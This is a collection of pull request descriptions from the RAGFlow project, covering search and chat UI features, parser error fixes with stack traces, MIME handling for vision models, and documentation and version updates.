### What problem does this PR solve?
Fix (next search): Optimize the search problem interface and related
functions #3221
- Add search_id to the retrieval_test interface
- Optimize the handleSearchStrChange and handleSearch callbacks to determine
whether to enable AI search based on the search configuration
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Reset all data except the first one on the chat page shared with
others #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Fixed an issue where renaming a chat would create a new chat #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Switch the root route to the new page #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix (search): Search application list supports renaming function #3221
- Update the search application list page and add a renaming operation
entry
- Modify the search application details interface to support obtaining
detailed information
- Optimize search settings page layout and style
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Update version tags in README files (including translations) from
v0.20.1 to v0.20.2
- Modify Docker image references and documentation to reflect new
version
- Update version badges and image descriptions
- Maintain consistency across all language variants of README files
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Fix: Fixed the issue where clicking the SQL tool test button did not
request the interface #9541
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Refactor OpenAI to enable audio parsing.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Refactoring
### What problem does this PR solve?
Allow the Retrieval kb_ids parameter to accept a kb_id, and allow it to
take a list of kb_name or kb_id values.
- Check whether the knowledge base name is a list, and support batch
queries
- When the knowledge base name does not exist, try querying by ID
- If both query methods fail, throw an exception
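The lookup order described above can be sketched roughly as follows. This is a minimal illustration, not the code from this PR: `resolve_kb_ids`, `find_by_name`, and `find_by_id` are hypothetical names, and the two lookups are injected as callables that return an ID or `None`.

```python
from typing import Callable, Optional, Union


def resolve_kb_ids(
    kb_ids: Union[str, list],
    find_by_name: Callable[[str], Optional[str]],
    find_by_id: Callable[[str], Optional[str]],
) -> list:
    """Resolve one value or a list of values (names or IDs) to knowledge base IDs."""
    # Accept either a single value or a list (batch query).
    items = kb_ids if isinstance(kb_ids, list) else [kb_ids]
    resolved = []
    for item in items:
        # Try the value as a name first, then fall back to treating it as an ID.
        kb_id = find_by_name(item) or find_by_id(item)
        if kb_id is None:
            # Both lookups failed.
            raise ValueError(f"Knowledge base not found: {item}")
        resolved.append(kb_id)
    return resolved
```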
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Move stop_event.wait(6) into finally block so that even when an
exception occurs, the loop still sleeps before retrying. This prevents
busy looping and excessive error logs when Redis connection fails.
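A minimal sketch of the pattern, assuming a generic worker loop: `run_loop` and `work` are hypothetical names, and only `stop_event.wait(6)` comes from the description above.

```python
import logging
import threading


def run_loop(work, stop_event: threading.Event, interval: float = 6.0) -> None:
    """Call work() repeatedly until stop_event is set, pausing between attempts."""
    while not stop_event.is_set():
        try:
            work()
        except Exception:
            logging.exception("iteration failed")
        finally:
            # Runs after success and after failure, so a failing call
            # (for example a dropped connection) cannot spin in a tight loop.
            stop_event.wait(interval)
```

Because `Event.wait` returns as soon as the event is set, shutdown is not delayed by the full interval.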
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Allow agent operators to select speech-to-text models #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
feat(search): Optimized search functionality and user interface #3221
- Added similarity threshold adjustment function
- Optimized mind map display logic
- Adjusted search settings interface layout
- Fixed related search and document viewing functions
- Optimized time display and node selection logic
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Update search_app.py to use SearchService instead of
KnowledgebaseService for duplicate
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Displays the embedded page of the chat module #3221
Feat: Let the agent operator support selecting a TTS model #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix Gemini parameters error.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Fix (search): Optimize the search page functionality and UI #3221
- Add a search list component
- Implement search settings
- Optimize search result display
- Add related search functionality
- Adjust the search input box style
- Unify internationalized text
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Add embedded search functionality.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
- Update httpx dependency to include socks support in pyproject.toml
- Update lockfile with new socksio dependency
### Type of change
- [x] Update dependencies for proxy support
### What problem does this PR solve?
Feat: Fixed the chat model setting echo issue
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
1. Use input length to prepare res
2. Adjust torch_empty_cache code location
### Type of change
- [x] Refactoring
- [x] Performance Improvement
### What problem does this PR solve?
There is a problem with the implementation of the Agent begin-form:
although the enablePrologue switch and the prologue input box are hidden
in Task mode, these values are still saved in the form data. If the user
first enables the opening and sets the content in Conversational mode,
and then switches to Task mode, these values will still be saved and may
be used in some scenarios.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
feat(search): Added app embedding functionality and optimized search
page #3221
- Added an Embed App button and related functionality
- Optimized the layout and interaction of the search settings interface
- Adjusted the search result display method
- Refactored some code to support new features
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Add SMTP support for user invitation emails
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Conversation completion can specify a different model
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add metadata configuration for new chats #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Handle unexpected truncated Excel files.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- Unified configuration format: All services now use the same image
configuration structure for consistency.
- Private registry support: Added imagePullSecrets to enable pulling
images from private registries.
- Per-service flexibility: Each service can override image-related
parameters independently.
### What problem does this PR solve?
When requesting data over HTTP, if the JSON string returned by the
interface contains an unescaped backslash sequence such as '\u', Python's
re module treats 'u' as the start of a Unicode escape, but no valid
4-digit hexadecimal number follows, so it raises an error directly.
Error: re.error: bad escape \u at position 26
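One common way to hit this error is passing untrusted text as the replacement template of `re.sub`. Whether that is the exact call site fixed here is an assumption; the sketch below only reproduces the error class and shows a callable replacement, which is inserted verbatim. The `payload` string and the `{body}` placeholder are made up for illustration.

```python
import re

# Hypothetical response text containing a stray "\u" (raw string, so the
# backslashes are literal characters).
payload = r'{"path": "C:\users\demo"}'

# As a replacement template, "\u" is parsed as an escape and rejected.
try:
    re.sub(r"\{body\}", payload, "data={body}")
except re.error as exc:
    error_message = str(exc)

# A callable replacement is used as-is, with no escape processing.
safe = re.sub(r"\{body\}", lambda _match: payload, "data={body}")
```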
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Delete or filter conversations #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Upload files in the chat box #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Allow generating an agent node directly by dragging and dropping the
connecting line (#9226)
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
fix: preserve correct MIME & unify data URL handling for vision inputs
(relates #9248)
- Updated image2base64() to return a full data URL
(data:image/<fmt>;base64,...) with accurate MIME
- Removed hardcoded image/jpeg in Base._image_prompt(); pass through
data URLs and default raw base64 to image/png
- Set AnthropicCV._image_prompt() raw base64 media_type default to
image/png
- Ensures MIME type matches actual image content, fixing “cannot process
base64 image” errors on vLLM/OpenAI-compatible backends
### What problem does this PR solve?
This PR fixes a compatibility issue where base64-encoded images sent to
vision models (e.g., vLLM/OpenAI-compatible backends) were rejected due
to mismatched MIME type or incorrect decoding.
Previously, the backend:
- Always converted raw base64 into data:image/jpeg;base64,... even if
the actual content was PNG.
- In some cases, base64 decoding was attempted on the full data URL
string instead of the pure base64 part.
This caused errors like:
```
cannot process base64 image
failed to decode base64 string: illegal base64 data at input byte 0
```
by strict validators such as vLLM.
With this fix, the MIME type in the request now matches the actual image
content, and data URLs are correctly handled or passed through, ensuring
vision models can decode and process images reliably.
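The handling described above might look roughly like this. It is a sketch under assumptions: `to_data_url` is a hypothetical helper, and sniffing the format from magic bytes is one possible way to pick an accurate MIME type, not necessarily how `image2base64()` does it.

```python
import base64

# Leading bytes of a few common image formats.
_SIGNATURES = {
    b"\x89PNG\r\n\x1a\n": "image/png",
    b"\xff\xd8\xff": "image/jpeg",
    b"GIF87a": "image/gif",
    b"GIF89a": "image/gif",
}


def to_data_url(image: str, default_mime: str = "image/png") -> str:
    """Return a data URL for a raw base64 string; pass existing data URLs through."""
    if image.startswith("data:"):
        # Already a full data URL: do not decode or re-wrap it.
        return image
    raw = base64.b64decode(image)
    mime = next(
        (m for sig, m in _SIGNATURES.items() if raw.startswith(sig)),
        default_mime,  # unknown content falls back to the default
    )
    return f"data:{mime};base64,{image}"
```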
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Send data to compare the performance of different models' answers
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Agent template: report agent using knowledge base
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
feat(next-search): Implements document preview functionality
- Adds a new document preview modal component
- Implements document preview page logic
- Adds document preview-related hooks
- Optimizes document preview rendering logic
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
The KB folder may not exist when creating a virtual file. #9423
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Display a separate chat multi-model comparison page #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Make `session_id` optional and add `inputs` parameter
- Remove deprecated `sync_dsl` parameter
- Update request/response examples to match current API behavior
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Update broken create agent session due to v0.20.0 changes. #9383
**NOTE: A session ID is no longer required to interact with the agent.**
See: #9241, #9309.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Show multiple chat boxes #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add `url`, `doc_type`, and `created_at` fields to the API response
example in the documentation.
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Feat: Fixed the issue where some fields in the chat configuration could
not be displayed #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Allow setting multiple types of default models in the service config.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
- Add type and boundary checks for conv["reference"] access
- Prevent KeyError: 0 when reference list is empty or malformed
- Ensure reference is list type before indexing
- Handle cases where reference items are None or missing chunks
- Maintains backward compatibility with existing data structures
This resolves crashes in /api/v1/agents/<agent_id>/sessions endpoint
when conversation reference data is not properly structured.
### What problem does this PR solve?
This PR fixes a critical `KeyError: 0` that occurs in the
`/api/v1/agents/<agent_id>/sessions` endpoint when the system attempts
to access conversation reference data that is not properly structured.
**Background Context:**
The `list_agent_session` method in `api/apps/sdk/session.py` assumes
that `conv["reference"]` is always a properly indexed list with valid
dictionary structures. However, in real-world scenarios, this data can
be:
- Not a list type (could be None, string, or other types)
- An empty list when `chunk_num` tries to access index 0
- Contains None values or malformed dictionary structures
- Missing expected "chunks" keys in reference items
**Impact Before Fix:**
When malformed reference data is encountered, the API crashes with:
```json
{
"code": 100,
"data": null,
"message": "KeyError(0)"
}
```
**Solution:**
Added comprehensive safety checks including type validation, boundary
checking, null safety, and structure validation to ensure the API
gracefully handles all reference data formats while maintaining backward
compatibility.
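The checks listed above can be sketched as a single defensive accessor. `chunks_at` is a hypothetical helper written for illustration; the actual changes in `list_agent_session` may be structured differently.

```python
from typing import Any


def chunks_at(reference: Any, index: int) -> list:
    """Return reference[index]["chunks"], or [] if the data is malformed."""
    # Type validation: reference must be a list.
    if not isinstance(reference, list):
        return []
    # Boundary check: avoids failing on an empty or too-short list.
    if not 0 <= index < len(reference):
        return []
    item = reference[index]
    # Null safety and structure validation for the item itself.
    if not isinstance(item, dict):
        return []
    chunks = item.get("chunks")
    return chunks if isinstance(chunks, list) else []
```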
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Change return type of _generate_streamly from str to Generator[str,
None, None] to properly type hint streaming responses.
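For illustration, a generator annotated this way looks like the following. `stream_answer` is a hypothetical function, not `_generate_streamly` itself.

```python
from typing import Generator


def stream_answer(parts: list) -> Generator[str, None, None]:
    """Yield the accumulated answer after each new part arrives."""
    answer = ""
    for part in parts:
        answer += part
        # Yield type is str; the send and return types are both None.
        yield answer
```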
### Type of change
- [x] Refactoring
### What problem does this PR solve?
When the Begin component has an optional file that does not exist, it raises an error.
### Type of change
- [x] Bug Fix
Co-authored-by: Popmio <zhengyihao036@gamil.com>
### What problem does this PR solve?
Feat: Added meta data to the chat configuration page #8531
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
fix "File contains no valid workbook part"
stacktrace:
```
Traceback (most recent call last):
File "/ragflow/deepdoc/parser/excel_parser.py", line 54, in _load_excel_to_workbook
return RAGFlowExcelParser._dataframe_to_workbook(df)
File "/ragflow/deepdoc/parser/excel_parser.py", line 69, in _dataframe_to_workbook
ws.cell(row=row_num, column=col_num, value=value)
File "/ragflow/.venv/lib/python3.10/site-packages/openpyxl/worksheet/worksheet.py", line 246, in cell
cell.value = value
File "/ragflow/.venv/lib/python3.10/site-packages/openpyxl/cell/cell.py", line 218, in value
self._bind_value(value)
File "/ragflow/.venv/lib/python3.10/site-packages/openpyxl/cell/cell.py", line 197, in _bind_value
value = self.check_string(value)
File "/ragflow/.venv/lib/python3.10/site-packages/openpyxl/cell/cell.py", line 165, in check_string
raise IllegalCharacterError(f"{value} cannot be used in worksheets.")
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Before executing the SQL, remove tags in the format [ID: number] to
avoid execution errors.
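A minimal sketch of such a cleanup step, assuming the tags look exactly like `[ID: 12]` with optional whitespace after the colon; `strip_id_tags` is a hypothetical name.

```python
import re

# Matches tags such as "[ID: 12]" or "[ID:12]".
_ID_TAG = re.compile(r"\[ID:\s*\d+\]")


def strip_id_tags(sql: str) -> str:
    """Remove [ID: number] tags from a SQL string before execution."""
    return _ID_TAG.sub("", sql).strip()
```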
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: wangyazhou <wangyazhou@sdibd.cn>
### What problem does this PR solve?
Add a fallback to the `calamine` engine when a parse error is raised by
the default `openpyxl` / `xlrd` engine.
For example, the following error can be fixed:
```
Traceback (most recent call last):
File "/ragflow/deepdoc/parser/excel_parser.py", line 53, in _load_excel_to_workbook
df = pd.read_excel(file_like_object)
File "/ragflow/.venv/lib/python3.10/site-packages/pandas/io/excel/_base.py", line 495, in read_excel
io = ExcelFile(
File "/ragflow/.venv/lib/python3.10/site-packages/pandas/io/excel/_base.py", line 1567, in __init__
self._reader = self._engines[engine](
File "/ragflow/.venv/lib/python3.10/site-packages/pandas/io/excel/_xlrd.py", line 46, in __init__
super().__init__(
File "/ragflow/.venv/lib/python3.10/site-packages/pandas/io/excel/_base.py", line 573, in __init__
self.book = self.load_workbook(self.handles.handle, engine_kwargs)
File "/ragflow/.venv/lib/python3.10/site-packages/pandas/io/excel/_xlrd.py", line 63, in load_workbook
return open_workbook(file_contents=data, **engine_kwargs)
File "/ragflow/.venv/lib/python3.10/site-packages/xlrd/__init__.py", line 172, in open_workbook
bk = open_workbook_xls(
File "/ragflow/.venv/lib/python3.10/site-packages/xlrd/book.py", line 68, in open_workbook_xls
bk.biff2_8_load(
File "/ragflow/.venv/lib/python3.10/site-packages/xlrd/book.py", line 641, in biff2_8_load
cd.locate_named_stream(UNICODE_LITERAL(qname))
File "/ragflow/.venv/lib/python3.10/site-packages/xlrd/compdoc.py", line 398, in locate_named_stream
result = self._locate_stream(
File "/ragflow/.venv/lib/python3.10/site-packages/xlrd/compdoc.py", line 429, in _locate_stream
raise CompDocError("%s corruption: seen[%d] == %d" % (qname, s, self.seen[s]))
xlrd.compdoc.CompDocError: Workbook corruption: seen[2] == 4
```
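The fallback idea can be sketched with the reader injected as a callable, so the snippet runs without pandas installed. `read_with_fallback` is a hypothetical helper; in practice `read` could be `pandas.read_excel`, whose `engine` argument accepts `"calamine"` in recent pandas versions when the python-calamine package is installed.

```python
from typing import Any, Callable, Optional, Sequence


def read_with_fallback(
    read: Callable[..., Any],
    source: Any,
    engines: Sequence[Optional[str]] = (None, "calamine"),
) -> Any:
    """Try each engine in order and return the first successful result."""
    if not engines:
        raise ValueError("at least one engine is required")
    last_error: Optional[Exception] = None
    for engine in engines:
        # Rewind file-like inputs so every attempt reads from the start.
        if hasattr(source, "seek"):
            source.seek(0)
        try:
            return read(source, engine=engine)
        except Exception as exc:
            last_error = exc
    raise last_error
```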
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/9385
Based on my understanding, I think checking empty string is fine
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
feat(next-search): Added AI summary functionality #3221
- Added the LlmSettingFieldItems component for AI summary settings
- Updated the SearchSetting component to integrate AI summary
functionality
- Added the updateSearch hook and related service methods
- Modified the ISearchAppDetailProps interface to add the llm_setting
field
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
All models pass the mock response tests, which means that if a model
returns the correct response, everything should work as expected.
However, not all models have been fully tested in a real environment
with a real API_KEY. I suggest actively monitoring the refactored models
over the coming period to ensure they work correctly and fixing them
step by step, or waiting to merge until most have been tested in a
practical environment.
### Type of change
- [x] Refactoring
### What problem does this PR solve?
- Fix error message assertion in test_update_chunk.py to match new
ownership validation
- Simplify dataset listing test cases by removing lambda assertions for
sorting
- Fix actions:
https://github.com/infiniflow/ragflow/actions/runs/16885465524/job/47831942553
### Type of change
- [x] Fix test cases
### What problem does this PR solve?
The Python class Document was missing "meta_fields"; for example,
document instances returned by a query came without meta_fields.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Allow chat to use meta data #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Using the MCP server in n8n sometimes (with smaller models) results in
errors because the LLM drops or adds a character in the list of
dataset_ids provided. It first asks for the list of datasets, and if
the list is large it makes an error when recalling the complete list.
Adding the option to search through all available datasets solves this
and makes data retrieval more stable. The ability to query specific
datasets by ID is unchanged; dataset_ids is simply no longer required
(only "question" is). As before, you can provide a list of datasets, an
empty list, or no list at all.
### Type of change
- [X] New Feature (non-breaking change which adds functionality)
<img width="1897" height="880" alt="mcp error dataset id"
src="https://github.com/user-attachments/assets/71076d24-f875-4663-a69a-60839fc7a545"
/>
Fixes an issue where running the sandbox (code component) fails due to
unresolved hostnames. Added missing service names (es01, infinity,
mysql, minio, redis) to 127.0.0.1 in the /etc/hosts example.
Reference: https://github.com/infiniflow/ragflow/issues/8226
## What this PR does
Updates the sandbox quickstart documentation to fix a known issue where
the sandbox fails to resolve required service hostnames.
## Why
Following the original instruction leads to a `Failed to resolve 'none'`
error, as discussed in issue #8226. Adding the missing service names to
`127.0.0.1` resolves the problem.
## Related issue
https://github.com/infiniflow/ragflow/issues/8226
## Note
It might be better to add `127.0.0.1 es01 infinity mysql minio redis` to
docs/quickstart.mdx, but since no issues appeared at the time without
adding this line—and the problem occurred while working with the code
component—I added it here.
### Type of change
- [X] Documentation Update
- Root cause: accessing req.get("dataset_ids") returns None when the key
is absent, causing KeyError.
- Fix: use req.get("dataset_ids", []) to default to empty list.
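For reference, the three access patterns behave as follows in plain Python. The `req` dictionary here is a made-up example, and which pattern the original code used is not shown in this description.

```python
req = {"question": "What is RAG?"}  # no "dataset_ids" key

# Subscript access raises KeyError when the key is absent.
try:
    req["dataset_ids"]
    subscript_failed = False
except KeyError:
    subscript_failed = True

# .get() without a default returns None, which breaks later iteration.
without_default = req.get("dataset_ids")

# .get() with a default returns an empty list that is safe to iterate.
with_default = req.get("dataset_ids", [])
```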
### What problem does this PR solve?
- Modify error message assertion in chunk update test to check for
document ownership
- Add GraphRAG configuration with `use_graphrag: False` in dataset
update tests
- Fix actions:
https://github.com/infiniflow/ragflow/actions/runs/16863637898/job/47767511582
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- The default dataset_ids "kb1" was removed from the Chat class.
- The HTTP API response does not include the dataset_ids field.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Add full list of supported AWS Bedrock regions.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
fix "no `tc` element at grid_offset", just log warning and ignore.
stacktrace:
```
Traceback (most recent call last):
File "/ragflow/rag/svr/task_executor.py", line 620, in handle_task
await do_handle_task(task)
File "/ragflow/rag/svr/task_executor.py", line 553, in do_handle_task
chunks = await build_chunks(task, progress_callback)
File "/ragflow/rag/svr/task_executor.py", line 257, in build_chunks
cks = await trio.to_thread.run_sync(lambda: chunker.chunk(task["name"], binary=binary, from_page=task["from_page"],
File "/ragflow/.venv/lib/python3.10/site-packages/trio/_threads.py", line 447, in to_thread_run_sync
return msg_from_thread.unwrap()
File "/ragflow/.venv/lib/python3.10/site-packages/outcome/_impl.py", line 213, in unwrap
raise captured_error
File "/ragflow/.venv/lib/python3.10/site-packages/trio/_threads.py", line 373, in do_release_then_return_result
return result.unwrap()
File "/ragflow/.venv/lib/python3.10/site-packages/outcome/_impl.py", line 213, in unwrap
raise captured_error
File "/ragflow/.venv/lib/python3.10/site-packages/trio/_threads.py", line 392, in worker_fn
ret = context.run(sync_fn, *args)
File "/ragflow/rag/svr/task_executor.py", line 257, in <lambda>
cks = await trio.to_thread.run_sync(lambda: chunker.chunk(task["name"], binary=binary, from_page=task["from_page"],
File "/ragflow/rag/app/naive.py", line 384, in chunk
sections, tables = Docx()(filename, binary)
File "/ragflow/rag/app/naive.py", line 230, in __call__
while i < len(r.cells):
File "/ragflow/.venv/lib/python3.10/site-packages/docx/table.py", line 438, in cells
return tuple(_iter_row_cells())
File "/ragflow/.venv/lib/python3.10/site-packages/docx/table.py", line 436, in _iter_row_cells
yield from iter_tc_cells(tc)
File "/ragflow/.venv/lib/python3.10/site-packages/docx/table.py", line 424, in iter_tc_cells
yield from iter_tc_cells(tc._tc_above) # pyright: ignore[reportPrivateUsage]
File "/ragflow/.venv/lib/python3.10/site-packages/docx/oxml/table.py", line 741, in _tc_above
return self._tr_above.tc_at_grid_offset(self.grid_offset)
File "/ragflow/.venv/lib/python3.10/site-packages/docx/oxml/table.py", line 98, in tc_at_grid_offset
raise ValueError(f"no `tc` element at grid_offset={grid_offset}")
ValueError: no `tc` element at grid_offset=10
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
fix "broken data stream when writing image file", just log warning and
ignore
Close #8379
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fixes the issue in the analyze_task execution flow where the Lead Agent
was not utilizing its own sys_prompt during task analysis, resulting in
incorrect or incomplete task planning.
https://github.com/infiniflow/ragflow/issues/9294
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- The enum import was changed from Python's built-in StrEnum to the
strenum package.
- Fix error `Warning: Failed to import module code_exec: cannot import
name 'StrEnum' from 'enum' (/usr/lib/python3.10/enum.py)`
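`enum.StrEnum` only exists in Python 3.11 and later, which is why the import fails on 3.10. The PR switches to the strenum package; purely as an illustration of the version issue, and not the change made here, a dependency-free fallback could look like this (the local `StrEnum` class is an assumption for the sketch):

```python
try:
    from enum import StrEnum  # available from Python 3.11
except ImportError:
    from enum import Enum

    class StrEnum(str, Enum):
        """Small stand-in for enum.StrEnum on older interpreters."""

        def __str__(self) -> str:
            return str(self.value)


class Language(StrEnum):
    PYTHON = "python"
    NODEJS = "nodejs"
```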
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Run eslint when the project is running to standardize everyone's
code #9377
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
add ru
### What problem does this PR solve?
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Co-authored-by: Yingfeng <yingfeng.zhang@gmail.com>
### What problem does this PR solve?
Feat: Modify the agent list return field name #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: New search page components and features #3221
- Added search homepage, search settings, and ongoing search components
- Implemented features such as search app list, creating search apps,
and deleting search apps
- Optimized the multi-select component, adding disabled state and suffix
display
- Adjusted navigation hooks to support search page navigation
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Update version tags in README files (including translations) from
v0.20.0 to v0.20.1
- Modify Docker image references and documentation to reflect new
version
- Update version badges and image descriptions
- Maintain consistency across all language variants of README files
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Revert token_required decorator of agent_bot completions and inputs.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Refactoring
### What problem does this PR solve?
feat(agent): Adds prologue functionality #3221
- Add a prologue field to the IInputs type
- Initialize the prologue state in the chat container
- Use useEffect to monitor prologue changes and add prologue responses
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
new Agent templates: you can choose your knowledge base, providing
workflow and Agent versions
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Set the description of the agent, which can be null #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Render agent setting dialog #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Update broken agent completion due to v0.20.0 changes. #9199
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Contribute a new workflow template: SQL Assistant
### Type of change
- [x] Other (please describe): new workflow template
### What problem does this PR solve?
Feat: Restore the button's background color #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Replace color variables according to design draft #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Configure colors according to the design draft #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix virtual file cannot be displayed in KB. #9265
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
fix: Optimized popups and the search page #3221
- Added a new PortalModal component
- Refactored the Modal component, adding show and hide methods to
support popups
- Updated the search page, adding a new query function and optimizing
the search card style
- Localized, added search-related translations
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Add missing env var `MYSQL_MAX_PACKET` to service_conf.yaml.template,
and add default values to opendal config to fix npe.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Updated constructors for base and derived classes in chat, embedding,
rerank, sequence2txt, and tts models to accept **kwargs. This change
improves extensibility and allows passing additional parameters without
breaking existing interfaces.
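A minimal sketch of the constructor pattern, with hypothetical class and parameter names (`Base`, `ChatModel`, `base_url`) rather than the real model classes:

```python
class Base:
    def __init__(self, key: str, model_name: str, **kwargs):
        # Extra keyword arguments are accepted and ignored here, so callers
        # can pass new options without breaking this signature.
        self.key = key
        self.model_name = model_name


class ChatModel(Base):
    def __init__(self, key: str, model_name: str, base_url: str = "", **kwargs):
        # Forward anything this class does not consume to the parent.
        super().__init__(key, model_name, **kwargs)
        self.base_url = base_url


# An unknown option such as timeout no longer raises TypeError.
model = ChatModel("secret", "demo-model", base_url="http://localhost", timeout=30)
```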
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: IT: Sop.Son <sop.son@feavn.local>
Co-authored-by: Copilot <175728472+Copilot@users.noreply.github.com>
### What problem does this PR solve?
Feat: Search conversation by name #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Create a conversation #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Improve the logic so that the test image is not base64-decoded each
time
### Type of change
- [x] Refactoring
- [x] Performance Improvement
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Add Claude Opus 4.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
- [x] Refactoring
### What problem does this PR solve?
Fix: If chunk["content_with_weight"] contains one or more unpaired
surrogate characters (such as incomplete emoji or other special
characters), then calling .encode("utf-8") directly will raise a
UnicodeEncodeError.
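The failure and one possible mitigation can be reproduced in a few lines. Which error-handling policy this PR actually applies is not stated, so `errors="replace"` below is an assumption, and `safe_utf8` is a hypothetical helper.

```python
def safe_utf8(text: str) -> bytes:
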